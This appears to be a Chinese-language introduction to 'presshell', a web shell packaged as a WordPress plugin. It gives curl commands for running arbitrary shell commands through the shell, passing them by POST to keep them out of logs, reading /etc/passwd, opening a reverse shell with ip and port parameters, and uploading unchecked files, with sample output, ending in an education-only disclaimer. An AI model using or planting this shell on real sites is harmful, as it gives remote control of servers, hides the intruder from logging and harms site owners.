神兵利器 - presshell

安裝

要安裝 shell，我們假設您擁有 Wordpress 的管理權限并且可以安裝插件，因為將 PHP 文件傳輸到媒體庫無論如何都不應該工作。否則，你有一個更大的問題。

只需將位于 Releases 部分的 zip 文件作為新擴展上傳，您就可以開始使用了。

用法

使用 shell 很簡單。只需將 sh命令作為參數傳遞給 shell：

curl ' http://host/.../shell.php?cmd=uname+-a ' 
Linux wordpress-server 2.6.32-21-generic-pae # 32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux

您也可以在 POST 請求中傳遞這些參數，這是將命令排除在日志之外的推薦方法。

curl ' http://host/.../shell.php ' --data-urlencode ' cmd=ls ' 
LICENSE 
README.md 
shell.php

還支持更復雜的命令，但請注意您的引用。

curl ' http://host/.../shell.php ' --data-urlencode ' cmd=cat /etc/passwd | grep -v "\(false\|nologin\)" ' 
root:x:0:0:root:/root:/bin/bash 
sync:x:4:65534:sync:/bin:/bin/sync
curl ' http://host/.../shell.php ' --data-urlencode ' cmd=python -c "from urllib.parse import urlencode; print(urlencode({\"cmd\": \"uname -a\"}))" ' 
cmd=uname+-a

您還可以使用ip和port參數打開反向 shell。默認端口是443.

curl ' http://host/.../shell.php ' --data-urlencode ' ip=127.0.0.1 '
curl ' http://host/.../shell.php ' --data-urlencode ' ip=127.0.0.1 ' --data-urlencode ' port=1337 '

為了方便，還提供了一個選項，可以無條件地將文件上傳到插件的目錄，而無需檢查。

curl 'http://host/.../shell.php' -F 'file=@some_file'
curl 'http://host/.../shell.php' --data-urlencode 'cmd=ls'
LICENSE
README.md
shell.php
some_file

對公共或私人服務器進行未經授權的攻擊是非法的。此存儲庫的內容僅用于教育目的，如果不正確使用所提供的材料，作者將不承擔任何責任。